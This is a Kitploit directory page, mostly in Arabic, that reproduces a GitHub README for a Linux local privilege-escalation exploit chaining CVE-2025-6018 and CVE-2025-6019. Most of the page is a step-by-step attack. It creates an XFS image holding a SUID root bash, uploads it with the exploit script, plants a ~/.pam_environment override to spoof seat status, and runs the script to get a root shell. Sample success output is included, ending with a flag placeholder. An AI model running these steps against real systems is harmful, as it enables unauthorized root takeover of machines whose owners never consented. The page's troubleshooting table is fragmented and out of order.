Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit — CVE-2025-6018 + CVE-2025-6019 Privilege Escalation Exploit | Kitploit
أدوات/GitHubGitHub/muyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingRed TeamingBinary Exploitation
GitHubmuyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

CVE-2025-6018 + CVE-2025-6019 Privilege Escalation Exploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
121منذ 6 أشهرلم تتم المراجعة بعد

دليل تصعيد الامتيازات CVE-2025-6018 + CVE-2025-6019

中文

📋 خطوات الاستغلال السريعة

الخطوة 1: تجهيز صورة XFS (على الجهاز المحلي)

root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

الخطوة 2: رفع الملفات إلى الهدف

root@kitploit:~
# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

الخطوة 3: تسجيل الدخول الأول - إعداد PAM

root@kitploit:~
# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Critical: Logout (to activate PAM config)
exit

الخطوة 4: تسجيل الدخول الثاني - تنفيذ تصعيد الامتيازات

root@kitploit:~
# Re-login via SSH (PAM config now active)
ssh [email protected]

# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Execute privilege escalation script
bash exp.sh

✅ مؤشرات النجاح

إذا نجح الاستغلال، يجب أن ترى:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ ROOT FLAG                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 استكشاف الأخطاء وإصلاحها

المشكلةالحل
CanReboot يُرجع ('no',)

📌 نقاط أساسية

  • ✅ يجب تسجيل الخروج ثم إعادة تسجيل الدخول: إعداد PAM لا يسري إلا في الجلسات الجديدة
  • ✅ تحقق من CanReboot: تأكد من أنه يُرجع ('yes',) قبل تشغيل السكربت
  • ✅ استخدم تسجيل دخول SSH: لا تستخدم أسلوب التنفيذ ssh -t user@host "cmd"

🐱 الحارس القط

إذا فشل الأمر، تأكد من تنفيذ كل خطوة بدقة وبالترتيب!

تنزيل الأداة
تأكد من تسجيل الخروج ثم العودة (الخطوة 3)
خطأ Not authorizedتحقق من أن محتوى ~/.pam_environment صحيح
عدم العثور على SUID bashأعد رفع xfs.image وتحقق من تعيين بِت SUID